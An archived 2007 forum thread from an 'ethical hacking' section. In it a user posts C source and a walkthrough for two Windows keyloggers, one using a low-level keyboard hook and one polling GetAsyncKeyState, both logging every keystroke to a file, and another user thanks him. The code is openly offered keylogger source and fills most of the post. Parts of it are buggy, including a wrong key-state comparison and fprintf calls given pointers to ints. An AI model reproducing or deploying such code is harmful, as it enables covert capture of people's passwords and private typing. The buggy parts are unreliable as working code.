Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking (http://www.go4expert.com/forums/ethical-hacking-forum/)
-   -   Key Logger (http://www.go4expert.com/forums/key-logger-t2587/)

vishal sharma 17Jan2007 13:03

Key Logger
 

Introduction



Hmm ok guyz let me make it a little bit relevant herez a small key loggin program, let me tell you all im not much of a coder so please bear with me. ;) The examples below are for beginners in C/C++ with some basic knowledge of the windows - API.

CheckKeys()



This was an copy and paste job. Couldn't remember who wrote it, but thanks, anyway.

1. global hook

hook :

A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.

available hooks:

WH_CALLWNDPROC
WH_CALLWNDPROCRET
WH_CBT
WH_DEBUG
WH_FOREGROUNDIDLE
WH_GETMESSAGE
WH_JOURNALPLAYBACK
WH_JOURNALRECORD
WH_KEYBOARD
WH_KEYBOARD_LL
WH_MOUSE
WH_MOUSE_LL
WH_MSGFILTER
WH_SHELL
WH_SYSMSGFILTER

To install a hook you call this API-function :

Code:


HHOOK SetWindowsHookEx(
        int idHook, // type of hook to install
        HOOKPROC lpfn, // address of hook procedure
        HINSTANCE hMod, // handle to application instance
        DWORD dwThreadId // identity of thread to install hook for
);

- idhook

Specifies the type of hook procedure to be installed. We choose "WH_KEYBOARD_LL" (13).

- lpfn

The LowLevelKeyboardProc hook procedure is an application-defined or library-defined callback function used with the SetWindowsHookEx function. The system calls this function every time a new keyboard input event is about to be posted into a thread input queue. The keyboard input can come from the local keyboard driver or from calls to thekeybd_event function. If the input comes from a call to keybd_event, the input was "injected".

The HOOKPROC type defines a pointer to this callback function. LowLevelKeyboardProc is a placeholder for the application-defined or library-defined function name.

Code:

LRESULT CALLBACK LowLevelKeyboardProc(
        int nCode, // hook code
        WPARAM wParam, // message identifier
        LPARAM lParam // pointer to structure with message data

- hMod

In this case, our instance handle.

- dwThreadId

Specifies the identifier of the thread with which the hook procedure is to be associated. If this parameter is zero, the hook procedure is associated with all existing threads.

Now we know enough to create our first keylogger, using a global keyboard hook :

Code:

#include <stdio.h>
#include <windows.h>

#define FILENAME "keylog.txt"

void CheckKey(int key);

LRESULT CALLBACK KeyboardHook(
        int nCode, // hook code
        WPARAM wParam, // message identifier
        LPARAM lParam // pointer to structure with message data
);


typedef struct tagKBDLLHOOKSTRUCT {
        DWORD vkCode; // virtual key code
        DWORD scanCode; // scan code
        DWORD flags; // flags
        DWORD time; // time stamp for this message
        DWORD dwExtraInfo; // extra info from the driver or keybd_event
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;


HHOOK hHook;

int APIENTRY WinMain(HINSTANCE hInstance,
        HINSTANCE hPrevInstance,
        LPSTR lpCmdLine,
        int nCmdShow )
{

        hHook = SetWindowsHookEx(13, KeyboardHook, hInstance , 0);
       
        while (GetMessage(NULL,NULL,0,0)) ; // NOP while not WM_QUIT
       
        return UnhookWindowsHookEx(hHook);
}


LRESULT CALLBACK KeyboardHook (int nCode, WPARAM wParam, LPARAM lParam )
{

        if (nCode == HC_ACTION)
        {
                if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN)
                {
                        CheckKey (((PKBDLLHOOKSTRUCT)lParam)->vkCode);
                }
        }
       
        return CallNextHookEx(hHook, nCode, wParam, lParam);
}



void CheckKey(int key)
{
        FILE *pfile = fopen(FILENAME,"a+");
       
        // translate virtual key code to ascii
        // and write it to file..
       
        fclose(pfile);
}

2. GetAsyncKeyState()



The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

Code:

SHORT GetAsyncKeyState(
        int vKey // virtual-key code
);

- vKey

Specifies one of 256 possible virtual-key codes.

This is our second keylogger, now using GetAsyncKeyState() :

Code:

#include <stdio.h>
#include <windows.h>
#define FILENAME "keylog.txt"

void CheckKey(int key);

void main()
{
        while(1)
        {
                Sleep(10); // avoid 100% cpu usage
               
                for(int key=8; key<=190; key++)
                if (GetAsyncKeyState(key) == HC_ACTION)
                        CheckKey(key);
        }
}
void CheckKey(int key)
{
// ...
}

the CheckKey() function may look like :

Code:




void CheckKey(int key)
{
        FILE *pfile = fopen(FILENAME,"a+");
       
        if (key==8)
                fprintf(pfile,"%s","[del]");
        if (key==13)
                fprintf(pfile,"%s","\n");
        if (key==32)
                fprintf(pfile,"%s"," ");
        if (key==VK_CAPITAL)
                fprintf(pfile,"%s","[CAPS]");
        if (key==VK_TAB)
                fprintf(pfile,"%s","[TAB]");
        if (key==VK_SHIFT)
                fprintf(pfile,"%s","[SHIFT]");
        if (key==VK_CONTROL)
                fprintf(pfile,"%s","[CTRL]");
        if (key==VK_PAUSE)
                fprintf(pfile,"%s","[PAUSE]");
        if (key==VK_ESCAPE)
                fprintf(pfile,"%s","[ESC]");
        if (key==VK_END)
                fprintf(pfile,"%s","[END]");
        if (key==VK_HOME)
                fprintf(pfile,"%s","[HOME]");
        if (key==VK_LEFT)
                fprintf(pfile,"%s","[LEFT]");
        if (key==VK_UP)
                fprintf(pfile,"%s","[UP]");
        if (key==VK_RIGHT)
                fprintf(pfile,"%s","[RIGHT]");
        if (key==VK_DOWN)
                fprintf(pfile,"%s","[DOWN]");
        if (key==VK_SNAPSHOT)
                fprintf(pfile,"%s","[PRINT]");
        if (key==VK_NUMLOCK)
                fprintf(pfile,"%s","[NUM LOCK]");
        if (key==190 || key==110)
                fprintf(pfile,"%s",".");
       
        if (key >=96 && key <= 105)
        {
                key -= 48;
                fprintf(pfile,"%s",&key);
        }
       
        if (key >=48 && key <= 59)
                fprintf(pfile,"%s",&key);
       
        if (key !=VK_LBUTTON || key !=VK_RBUTTON)
        {
                if (key >=65 && key <=90)
                {
                        if (GetKeyState(VK_CAPITAL))
                                fprintf(pfile,"%s",&key);
                        else
                        {
                                key = key +32;
                                fprintf(pfile,"%s",&key);
                               
                        }
                }
        }
       
        fclose(pfile);
}

Compiled with MS VC++ 6.0.

Pavilion 20Jan2007 02:40

Re: Key Logger
 
Wow, that was an awesome post. Very well commented code. Thank you for the explanation of each portion of the program!


All times are GMT +5.5. The time now is 23:45.